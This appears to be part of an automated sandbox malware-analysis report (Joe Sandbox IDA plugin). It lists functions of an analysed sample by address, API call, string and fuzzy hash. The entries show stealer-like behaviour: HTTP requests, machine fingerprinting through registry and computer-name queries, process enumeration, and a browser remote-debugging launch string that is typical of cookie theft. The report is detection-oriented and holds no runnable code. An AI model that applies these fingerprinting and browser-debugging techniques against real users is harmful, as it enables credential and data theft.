Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InformationVolume
String ID: C
API String ID: 2039140958-1037565863
Opcode ID: 5a5f332a26c52b88cdf89dfde4ae2ee64c1a3e52609765cc6e5a0db2047a9748
Instruction ID: f23951d0304724457adad8bec389d43a973e5f06e832e688f550b5e0590e5ce3
Opcode Fuzzy Hash: 5a5f332a26c52b88cdf89dfde4ae2ee64c1a3e52609765cc6e5a0db2047a9748
Instruction Fuzzy Hash: EB111CB05493508FC301EF29C889A1AFFE0AF95304F05C56EE494C7322C232D696CB56

Function 0041898C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00418A39

Strings

GET, xrefs: 00418A1A, 00418A20, 00418A32, 00418A37

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: HttpOpenRequest
String ID: GET
API String ID: 1984915467-1805413626
Opcode ID: 036adbb3e0e60d69c1de55e1dc3f9deffbd20c9ba7e8cf9293e752316893f974
Instruction ID: 75a614c586498558a2b361bf9572b1714145ef71e51f341fab4e71487cad6604
Opcode Fuzzy Hash: 036adbb3e0e60d69c1de55e1dc3f9deffbd20c9ba7e8cf9293e752316893f974
Instruction Fuzzy Hash: 340113B5B002059FDB00CF98E8859BA77F9AB48211B004168E908E7322EBB5DD01CB55

Function 004189D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00418A39

Strings

GET, xrefs: 00418A1A, 00418A20, 00418A32, 00418A37

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: HttpOpenRequest
String ID: GET
API String ID: 1984915467-1805413626
Opcode ID: 22df017da15e4282cccc6d4869e978c3dc2aeead230586518fe6d1657d1fc8ef
Instruction ID: 360b509b851b883fea87794913567018529d20214be68e1510502b32d1773462
Opcode Fuzzy Hash: 22df017da15e4282cccc6d4869e978c3dc2aeead230586518fe6d1657d1fc8ef
Instruction Fuzzy Hash: B801E5B5B013059FD700CF98ED85DBA77F9EB48215B004568E908E7322EBB5DD05CB55

Function 00417289 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000000C7,?), ref: 00417251

Strings

lU:\U:, xrefs: 00417239

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID: lU:\U:
API String ID: 778332206-3948173833
Opcode ID: bbfc04d4517978a74dd27c93567b95cb007187e19398ea8aae095dcb582b45c5
Instruction ID: b23433032d89939c9a1c5686a1049642dde7bc222e88205bb36ef47a67ba72cc
Opcode Fuzzy Hash: bbfc04d4517978a74dd27c93567b95cb007187e19398ea8aae095dcb582b45c5
Instruction Fuzzy Hash: 92014871304251CFCB09CB98DD91EBA3BB1BF88340B5500A9E806EB352C660AC16CB55

Function 0042DE60 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 0042DE9F

Strings

MachineGuid, xrefs: 0042DE80, 0042DE86, 0042DE98, 0042DE9D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID: MachineGuid
API String ID: 3660427363-4186287252
Opcode ID: c66cf06dad364d8bac54bedbad56f9716f0add775f9a539457f02d0de4791144
Instruction ID: ba88c2097a3792caa789a2813ec4e7626ca2f95040182126447a6b438f43dc87
Opcode Fuzzy Hash: c66cf06dad364d8bac54bedbad56f9716f0add775f9a539457f02d0de4791144
Instruction Fuzzy Hash: EFF06276205214AFC610DF58ED84C97B3ECEF98302F444639F688C7611E634E925CBA6

Function 0042ECEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 0042ED2E

Strings

CurrentBuildNumber, xrefs: 0042ED13, 0042ED19, 0042ED27, 0042ED2C

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID: CurrentBuildNumber
API String ID: 3660427363-1022791448
Opcode ID: de1cb79093b787e971b755ba4a6434ff3f329c3daa267bf7f133a1c6b94a2073
Instruction ID: b3ce48cbf25b5b96d898ef4d4e9222a2c2e65e16991ee14dcf98a9894f916f96
Opcode Fuzzy Hash: de1cb79093b787e971b755ba4a6434ff3f329c3daa267bf7f133a1c6b94a2073
Instruction Fuzzy Hash: 57F03676620108AFD254EB04EC98C76B7EDEB49325B084639FE49C7361D236DC16CE65

Function 0042E20F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0042E26E

Strings

?, xrefs: 0042E243

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Open
String ID: ?
API String ID: 71445658-1684325040
Opcode ID: aa3523eac91cc744b58322a56da9ff371269731b1fb6674dbd17e779c2e49c37
Instruction ID: c422763f6e86e012ed51617d192ff3e042baae0879a5561e5dde49c82c68daff
Opcode Fuzzy Hash: aa3523eac91cc744b58322a56da9ff371269731b1fb6674dbd17e779c2e49c37
Instruction Fuzzy Hash: 37014FB6601315EFD320EF05DC40D56B7B9FFD5305F22C91AA8458B262C670D955CB91

Function 004172D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 004172DF

Strings

\U:, xrefs: 004172D7, 004172EB, 004172F7

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandleInternet
String ID: \U:
API String ID: 1081599783-3520650122
Opcode ID: ca577e094966fe71e91204a4a3c04e848e379c95ee275b5bb9559f7d086a8efc
Instruction ID: f27c74abee2a132deee621adf8a42b6cd6049cc866ef43a8cca0a930be463f5c
Opcode Fuzzy Hash: ca577e094966fe71e91204a4a3c04e848e379c95ee275b5bb9559f7d086a8efc
Instruction Fuzzy Hash: 63014B7A604212CFCB04CB98ED95DAD7BB6BF8831171550B5E902E7322C630EC52CB64

Function 0042DABE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(00000000), ref: 0042DAF1

Strings

__Q, xrefs: 0042DAFF

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID: __Q
API String ID: 3545744682-4057710983
Opcode ID: 1cdbf7e5f1fcb410054fd1285a0f0b87ce5c6212a8b75bf3e16044b3be1c0c03
Instruction ID: be0ca59ade7ecd798f7df36055df05fc3af05b95701f90fd905a97f074da757b
Opcode Fuzzy Hash: 1cdbf7e5f1fcb410054fd1285a0f0b87ce5c6212a8b75bf3e16044b3be1c0c03
Instruction Fuzzy Hash: F3E06DF13012005FD314DB1CDCD0F6B36ADEB95221B0A0128F905C7352C634EC618A69

Function 0043B1A9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 0043B1B9

Strings

Xy'I, xrefs: 0043B1D3

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindNext
String ID: Xy'I
API String ID: 2029273394-2702762207
Opcode ID: f3e83f93aabd4857b7b49c4c4aa8e0b9f655b093c567f8a7b53efdd5a3e4a469
Instruction ID: d73b5ef48538330b038cfa5cf1699eb6f033d0b1094463736a81413be13acbcd
Opcode Fuzzy Hash: f3e83f93aabd4857b7b49c4c4aa8e0b9f655b093c567f8a7b53efdd5a3e4a469
Instruction Fuzzy Hash: E3D017B0B0025A8FDB54CF64C895F6937B6AB95301F0680B8E609A32A2E636BD058F05

Function 00413E83 Relevance: 3.1, APIs: 2, Instructions: 78stringnetworkCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 00413F2F
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00413F49

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 9a9caeb269bd42e4b902408b913b89786a0500cdbd7b3965d966c38dac5569bb
Instruction ID: 8ac2d0027e0228dac80c1de52e30b844887a9818d1fc82b284216c5a1affe04f
Opcode Fuzzy Hash: 9a9caeb269bd42e4b902408b913b89786a0500cdbd7b3965d966c38dac5569bb
Instruction Fuzzy Hash: 9F2136B5A452249FD741CF2CEC85A4AB7E8FF48208B040479F818C7322EB74EE558F99

Function 00424FC0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00424FD0

Strings

--remote-debugging-port=9223 --profile-directory=", xrefs: 00425036, 0042503C, 00425042

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memset
String ID: --remote-debugging-port=9223 --profile-directory="
API String ID: 2221118986-1334509734
Opcode ID: 9a50220bff86a294718a31fd369e4dae0102c3ac23431620c094894538ed402a
Instruction ID: 0710bbe6aa66ab725586d7924017581952b2af0891fe642baede2a91e723ed24
Opcode Fuzzy Hash: 9a50220bff86a294718a31fd369e4dae0102c3ac23431620c094894538ed402a
Instruction Fuzzy Hash: DC313AB6A012088FD720DF68DC81B9977E8AB88305F04056AAD45E7362EB74EE44CF95

Function 0040191D Relevance: 3.0, APIs: 2, Instructions: 33memoryregistryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401953
RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401967

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocHeapOpen
String ID:
API String ID: 1634843882-0
Opcode ID: c4400e208c9cea2b76adef349ea05d37b32d96b72df845353cbd0a4d0a7a9e19
Instruction ID: 08071b77817c831f5e477c1fb27290d1eba7258756eaedfa8cd7f4ab22aef831
Opcode Fuzzy Hash: c4400e208c9cea2b76adef349ea05d37b32d96b72df845353cbd0a4d0a7a9e19
Instruction Fuzzy Hash: CFF06D75209305AFD614DB25EC5AD1B7BA8EF8E315B014168F9009B262DAB0A800CB60

Function 0042D6DB Relevance: 3.0, APIs: 2, Instructions: 31processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042D718
Process32First.KERNEL32(00000000,?), ref: 0042D72A

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 21dabb9cabdede840cccac72868f6578cb47e081edb6a75b8ec9c316f91510ba
Instruction ID: 58fc52e8d1a1c9204890e30fc30c294bf4a30385e1e5fa8a1872971ac4d05b39
Opcode Fuzzy Hash: 21dabb9cabdede840cccac72868f6578cb47e081edb6a75b8ec9c316f91510ba
Instruction Fuzzy Hash: 48F06DB6200301AFD710EF14DC88F5677B9EB89709F10841DA94597792D770AC25CB61

Function 00430498 Relevance: 3.0, APIs: 2, Instructions: 26processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004304BC
Process32First.KERNEL32(00000000,?), ref: 004304CB

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
